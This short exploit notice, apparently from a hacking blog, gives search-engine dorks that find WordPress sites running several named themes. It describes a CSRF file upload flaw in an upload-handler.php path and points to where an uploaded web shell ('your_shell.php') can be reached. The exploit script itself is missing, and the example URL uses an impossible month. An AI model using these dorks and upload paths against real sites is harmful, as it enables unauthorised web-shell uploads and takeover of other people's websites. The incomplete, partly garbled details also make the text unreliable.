#Dork :
inurl:”/wp-content/themes/agritourismo-theme/”
inurl:”/wp-content/themes/bordeaux-theme/”
inurl:”/wp-content/themes/bulteno-theme/”
inurl:”/wp-content/themes/oxygen-theme/”
inurl:”/wp-content/themes/radial-theme/”
inurl:”/wp-content/themes/rayoflight-theme/”
inurl:”/wp-content/themes/reganto-theme/”
inurl:”/wp-content/themes/rockstar-theme/”
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php
Script :
File Access :
http://site-target/wp-content/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php
Note :
Script CSRF equate with dork you use
评论关闭。